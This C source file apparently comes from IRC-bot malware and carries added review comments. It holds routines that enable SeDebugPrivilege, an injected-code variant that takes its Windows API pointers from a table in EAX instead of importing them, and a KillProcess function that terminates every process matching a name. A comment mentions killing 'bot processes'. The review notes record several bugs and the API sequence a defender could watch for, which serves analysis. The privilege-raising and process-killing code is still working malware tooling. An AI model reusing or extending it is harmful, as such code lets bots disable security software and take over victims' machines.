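// Enables (add != FALSE) or disables the privilege named by pPriv on the
// current process token.
//
// Parameters:
//   pPriv - privilege name as accepted by LookupPrivilegeValue.
//   add   - non-zero to set SE_PRIVILEGE_ENABLED, zero to clear it.
// Returns TRUE only when AdjustTokenPrivileges succeeded and the token
// actually held the privilege.  A token that does not hold the privilege
// makes AdjustTokenPrivileges return non-zero with
// GetLastError() == ERROR_NOT_ALL_ASSIGNED; that case is reported as FALSE
// here so callers do not mistake it for success.
//
// Changes from the previous version: tkp.Privileges[0].Attributes was
// read (|= / ^=) before ever being written, which is an uninitialized read,
// and the ERROR_NOT_ALL_ASSIGNED outcome was returned as TRUE.
BOOL AdjustPrivileges(char *pPriv, BOOL add)
{
    BOOL bRet = FALSE;
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES tkp;

    if (!fOpenProcessToken(GetCurrentProcess(),
                           TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
        return bRet;
    }

    if (!fLookupPrivilegeValue(NULL, pPriv, &tkp.Privileges[0].Luid)) {
        CloseHandle(hToken);
        return bRet;
    }

    tkp.PrivilegeCount = 1;
    // Assign the whole attribute word instead of or'ing/xor'ing into an
    // uninitialized field; an attribute value of 0 disables the privilege.
    tkp.Privileges[0].Attributes = add ? SE_PRIVILEGE_ENABLED : 0;

    if (fAdjustTokenPrivileges(hToken, FALSE, &tkp, 0,
                               (PTOKEN_PRIVILEGES)NULL, 0)) {
        // Non-zero return does not mean every privilege was adjusted.
        bRet = (GetLastError() != ERROR_NOT_ALL_ASSIGNED);
    }

    CloseHandle(hToken);
    return bRet;
}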
// Enables SeDebugPrivilege on the calling thread's token, falling back to
// the process token when no thread token can be opened.
//
// Parameters (both are out-parameters passed by reference):
//   hToken   - on success, the opened token; the caller owns it and must
//              close it.  On every failure path it is left NULL and no
//              handle remains open.
//   tPrivOld - previous state of the privilege as returned by
//              AdjustTokenPrivileges, so the caller can restore it later.
// Returns TRUE when the privilege was enabled, FALSE otherwise.
//
// NOTE(review): the return value of fLookupPrivilegeValue is not checked,
// so if the lookup fails the Luid handed to fAdjustTokenPrivileges is
// whatever was on the stack.
BOOL GetDebugPrivs(HANDLE &hToken, TOKEN_PRIVILEGES &tPrivOld)
{
    TOKEN_PRIVILEGES tPriv;
    DWORD cbPriv = sizeof(tPrivOld);
    BOOL bRet = FALSE;

    // Prefer the thread (impersonation) token; fall back to the process token.
    if (!fOpenThreadToken(GetCurrentThread(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, FALSE, &hToken))
        if (!fOpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
            hToken = NULL;

    if (hToken) {
        tPriv.PrivilegeCount = 1;
        tPriv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        fLookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tPriv.Privileges[0].Luid);

        if (fAdjustTokenPrivileges(hToken, FALSE, &tPriv, sizeof(tPriv), &tPrivOld, &cbPriv)) {
            // A non-zero return with ERROR_NOT_ALL_ASSIGNED means the token
            // does not hold the privilege at all; treat that as failure.
            if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
                CloseHandle(hToken);
                hToken = NULL;
            } else
                bRet = TRUE;
        } else {
            CloseHandle(hToken);
            hToken = NULL;
        }
    }

    return bRet;
}
// Imports this routine resolves at runtime (in the order it reads them
// from the table below, last to first):
//   OpenProcessToken
//   GetCurrentProcess
//   LookupPrivilegeValue
//   AdjustTokenPrivileges
//   SE_DEBUG_NAME "SeDebugPrivilege"
//
// Enables SeDebugPrivilege on the current process token without any
// static imports: on entry EAX is expected to point just past a table of
// five DWORDs (the privilege-name string pointer followed by the four
// API pointers above, lowest address first), which the MSVC inline `_asm`
// copies into pFuncPtr before the table is walked downwards.  x86/MSVC only.
//
// Parameters:
//   phProcessToken - receives the opened process token.
//   pOldToken      - receives the previous privilege state.
//   pdwOldCount    - receives the size written to pOldToken.
// Returns TRUE on success, FALSE when any of the three API calls fails.
//
// NOTE(review): once fOpenProcessToken has succeeded, the two later
// failure returns leave *phProcessToken open; the caller cannot tell
// whether a handle needs closing.
BOOL WINAPI IC_SetDebugPrivilege(HANDLE *phProcessToken, TOKEN_PRIVILEGES *pOldToken, DWORD *pdwOldCount)
{
    TOKEN_PRIVILEGES stNewToken;
    char *pSeDebugPrivilege = NULL;
    t_fAdjustTokenPrivilegeS fAdjustTokenPrivileges = NULL;
    t_fLookUpPrivilegeValue fLookupPrivilegeValue = NULL;
    t_fGetCurrentProcess fGetCurrentProcess = NULL;
    t_fOpenProcessToken fOpenProcessToken = NULL;
    DWORD *pFuncPtr = NULL;

    // EAX -> end of the caller-supplied pointer table.
    _asm MOV pFuncPtr, EAX
    pFuncPtr -= 2;
    pSeDebugPrivilege = (char*)*pFuncPtr;
    pFuncPtr--;
    fAdjustTokenPrivileges = (t_fAdjustTokenPrivilegeS)*pFuncPtr;
    pFuncPtr--;
    fLookupPrivilegeValue = (t_fLookUpPrivilegeValue)*pFuncPtr;
    pFuncPtr--;
    fGetCurrentProcess = (t_fGetCurrentProcess)*pFuncPtr;
    pFuncPtr--;
    fOpenProcessToken = (t_fOpenProcessToken)*pFuncPtr;

    if ( !fOpenProcessToken(fGetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, phProcessToken) ) {
        return FALSE;
    }

    // Token handle is open from here on; failure paths below do not close it.
    if ( !fLookupPrivilegeValue(NULL, pSeDebugPrivilege, &(stNewToken.Privileges[0].Luid)) ) {
        return FALSE;
    }

    stNewToken.PrivilegeCount = 1;
    stNewToken.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    if ( !fAdjustTokenPrivileges(*phProcessToken, FALSE, &stNewToken, sizeof(TOKEN_PRIVILEGES), pOldToken, pdwOldCount) ) {
        return FALSE;
    }

    return TRUE;
}
// Terminates every running process whose module base name equals
// szProcName, temporarily enabling SeDebugPrivilege so that processes of
// other users can be opened.
//
// Parameters:
//   szProcName - name to match; the base name read from each process is
//                uppercased before the strcmp (see note below), so the
//                argument must already be in upper case to match.  NULL
//                makes the function enumerate without terminating anything.
//   procKilled - optional output buffer that receives the kill count as
//                decimal text via an unbounded sprintf; the caller must
//                supply enough room.
// Returns true if at least one process was terminated.
//
// Observable from a defender's side: the sequence is AdjustTokenPrivileges
// (SeDebugPrivilege), EnumProcesses, OpenProcess with PROCESS_TERMINATE,
// GetModuleBaseName, TerminateProcess, then the privilege is restored.
//
// NOTE(review): the uppercase loop below indexes with `i` (the outer
// process index) instead of `ipn`; `i` can reach 1023 while
// szProcessName holds MAX_PATH bytes, so this is an out-of-bounds write
// as well as a broken conversion.
bool KillProcess(const char *szProcName, char *procKilled)
{
    DWORD aProcesses[1024], cbNeeded, cProcesses;
    bool bRetVal = false;
    unsigned int i;
    HMODULE hMod;

    // Get SeDebugPrivileges.  Failure here is not fatal: hToken stays NULL
    // and enumeration continues with the caller's ordinary access.
    TOKEN_PRIVILEGES tPriv, tPrivOld;
    DWORD cbPriv = sizeof(tPrivOld);
    HANDLE hToken;
    if (!fOpenThreadToken(GetCurrentThread(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, FALSE, &hToken))
        if (!fOpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
            hToken = NULL;
    if (hToken) {
        tPriv.PrivilegeCount = 1;
        tPriv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        // Return value unchecked: a failed lookup leaves the Luid unset.
        fLookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tPriv.Privileges[0].Luid);
        if (fAdjustTokenPrivileges(hToken, FALSE, &tPriv, sizeof(tPriv), &tPrivOld, &cbPriv)) {
            // Non-zero return with ERROR_NOT_ALL_ASSIGNED: privilege not held.
            if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
                CloseHandle(hToken);
                hToken = NULL;
            }
        } else {
            CloseHandle(hToken);
            hToken = NULL;
        }
    }

    // Enumerate processes
    if (!fEnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded))
        return false;
    cProcesses = cbNeeded / sizeof(DWORD);

    unsigned int killed = 0;
    for (i = 0; i < cProcesses; i++) {
        char szProcessName[MAX_PATH];
        strcpy(szProcessName, "unknown");
        HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_TERMINATE, FALSE, aProcesses[i]);
        if (hProcess) {
            if (fEnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded)) {
                fGetModuleBaseName(hProcess, hMod, szProcessName, sizeof(szProcessName));
                // Intended to uppercase szProcessName; uses `i` rather than `ipn`.
                for (int ipn = 0; ipn < strlen(szProcessName); ipn++)
                    *(szProcessName + i) = toupper(*(szProcessName + i));
                if (!szProcName) {
                    bRetVal = false;
                    // FIX ME: Could Kill all bot processes here
                } else {
                    // Kill the named process
                    if (!strcmp(szProcessName, szProcName)) {
                        killed++;
                        TerminateProcess(hProcess, 0);
                        bRetVal = true;
                    }
                }
            }
            CloseHandle(hProcess);
        }
    }

    if (procKilled)
        sprintf(procKilled, "%i", killed);

    // Drop SeDebugPrivileges: restore the state saved in tPrivOld.
    if (hToken) {
        fAdjustTokenPrivileges(hToken, FALSE, &tPrivOld, sizeof(tPrivOld), NULL, NULL);
        CloseHandle(hToken);
    }

    return bRetVal;
}